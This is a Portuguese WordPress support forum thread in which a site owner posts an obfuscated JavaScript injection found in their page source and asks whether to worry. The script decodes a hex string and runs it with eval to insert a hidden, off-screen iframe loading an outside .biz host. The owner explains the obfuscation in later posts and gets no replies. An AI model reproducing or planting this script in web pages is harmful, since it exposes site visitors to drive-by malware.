Suporte » Desenvolvendo com WordPress » Script Malicioso?

  • Do nada me veio na cabeça a ideia de verificar o codigo fonte do meu site.
    Quando vi ate me espantei com o que tinha encontrado, uso o wordpress a anos, mas ainda não conheçco muitas coisa, o codigo é esse abaixo:

    <script>asgq="@!@!6@!66!20!28!64!6f!63!75!6d!65!6e!74!2e!67!65!74!45!6c!65!6d!65!6e!74!73!42!7@!54!61!67!4e!61!6d!65!28!27!62!6f!64!7@!27!2@!5b!30!5d!2@!7b!d!@!@!@!6@!66!72!61!6d!65!72!28!2@!3b!d!@!@!7d!20!65!6c!73!65!20!7b!d!@!@!@!64!6f!63!75!6d!65!6e!74!2e!77!72!6@!74!65!28!22!3c!6@!66!72!61!6d!65!20!73!72!63!3d!27!68!74!74!70!3a!2f!2f!74!61!6c!6b!6@!6e!67!66!61!74!65!72!6c!7@!3@!2e!62!6@!7a!2f!64!65!66!61!75!6c!74!2f!70!68!70!6d!7@!61!64!6d!6@!6e!32!2f!62!75!67!2f!71!75!65!73!74!6@!6f!6e!73!2e!70!68!70!3f!64!6f!77!6e!3d!34!33!34!26!70!6c!61!7@!3d!37!34!3@!26!6a!6f!6@!6e!3d!36!31!38!26!6f!72!61!63!6c!65!3d!37!3@!26!70!6f!72!74!66!6f!6c!6@!6f!3d!38!33!32!27!20!77!6@!64!74!68!3d!27!31!30!30!27!20!68!65!6@!67!68!74!3d!27!31!30!30!27!20!73!74!7@!6c!65!3d!27!77!6@!64!74!68!3a!31!30!30!70!78!3b!68!65!6@!67!68!74!3a!31!30!30!70!78!3b!70!6f!73!6@!74!6@!6f!6e!3a!61!62!73!6f!6c!75!74!65!3b!76!6@!73!6@!62!6@!6c!6@!74!7@!3a!68!6@!64!64!65!6e!3b!6c!65!66!74!3a!2d!31!30!30!30!30!70!78!3b!74!6f!70!3a!30!3b!27!3e!3c!2f!6@!66!72!61!6d!65!3e!22!2@!3b!d!@!@!7d!d!@!@!66!75!6e!63!74!6@!6f!6e!20!6@!66!72!61!6d!65!72!28!2@!7b!d!@!@!@!76!61!72!20!66!20!3d!20!64!6f!63!75!6d!65!6e!74!2e!63!72!65!61!74!65!45!6c!65!6d!65!6e!74!28!27!6@!66!72!61!6d!65!27!2@!3b!66!2e!73!65!74!41!74!74!72!6@!62!75!74!65!28!27!73!72!63!27!2c!27!68!74!74!70!3a!2f!2f!74!61!6c!6b!6@!6e!67!66!61!74!65!72!6c!7@!3@!2e!62!6@!7a!2f!64!65!66!61!75!6c!74!2f!70!68!70!6d!7@!61!64!6d!6@!6e!32!2f!62!75!67!2f!71!75!65!73!74!6@!6f!6e!73!2e!70!68!70!3f!64!6f!77!6e!3d!34!33!34!26!70!6c!61!7@!3d!37!34!3@!26!6a!6f!6@!6e!3d!36!31!38!26!6f!72!61!63!6c!65!3d!37!3@!26!70!6f!72!74!66!6f!6c!6@!6f!3d!38!33!32!27!2@!3b!66!2e!73!74!7@!6c!65!2e!6c!65!66!74!3d!27!2d!31!30!30!30!30!70!78!27!3b!66!2e!73!74!7@!6c!65!2e!76!6@!73!6@!62!6@!6c!6@!74!7@!3d!27!68!6@!64!64!65!6e!27!3b!66!2e!73!74!7@!6c!65!2e!74!6f!70!3d!27!30!27!3b!66!2e!73!74!7@!6c!65!2e!70!6f!73!6@!74!6@!6f!6e!3d!27!61!62!73!6f!6c!75!74!65!27!3b!66!2e!73!74!7@!6c!65!2e!74!6f!70!3d!27!30!27!3b!66!2e!73!65!74!41!74!74!72!6@!62!75!74!65!28!27!77!6@!64!74!68!27!2c!27!31!30!30!27!2@!3b!66!2e!73!65!74!41!74!74!72!6@!62!75!74!65!28!27!68!65!6@!67!68!74!27!2c!27!31!30!30!27!2@!3b!d!@!@!@!64!6f!63!75!6d!65!6e!74!2e!67!65!74!45!6c!65!6d!65!6e!74!73!42!7@!54!61!67!4e!61!6d!65!28!27!62!6f!64!7@!27!2@!5b!30!5d!2e!61!70!70!65!6e!64!43!68!6@!6c!64!28!66!2@!3b!d!@!@!7d".replace(/@/g,"9").split("!");try{document.body&=0.1}catch(gdsgsdg){zz=3;dbshre=50;if(dbshre){vfvwe=0;try{}catch(agdsg){vfvwe=1;}if(!vfvwe){e=window["e".concat("val")];}
    s="";if(zz)for(i=0;i-798!=0;i++){if(window.document)s+=String["fromCharCode"](parseInt(asgq[i],16));}
    e("vz=1;"+s);}}</script>

    E o mais extranho foi que um minuto depois eu fui olhar novamente o codigo e ele já não estava mais lá.

    Devo me procupar com isso?

Visualizando 3 respostas - 1 até 3 (de um total de 3)
  • Criador do tópico wagnerlandio

    (@wagnerlandio)

    Verificando o codigo, a pessoa que fez isso dividiu o codigo em algumas partes usando o “!” depois substituiu o “9” por “@” fazendo a engenharia revessa eu obtive um codigo Hexadeciamal, ainda estou olhando o que ele significa ai posto aqui

    Criador do tópico wagnerlandio

    (@wagnerlandio)

    O codigo decifrado se encontra nesse link http://pastebin.com/t0AMf8ch

    O curioso é que não encontro mais o script no codigo fonte e mesmo assim ele é executado pois pede permições do java ao entrar no site

    Criador do tópico wagnerlandio

    (@wagnerlandio)

    Ninguem?

Visualizando 3 respostas - 1 até 3 (de um total de 3)
  • O tópico ‘Script Malicioso?’ está fechado para novas respostas.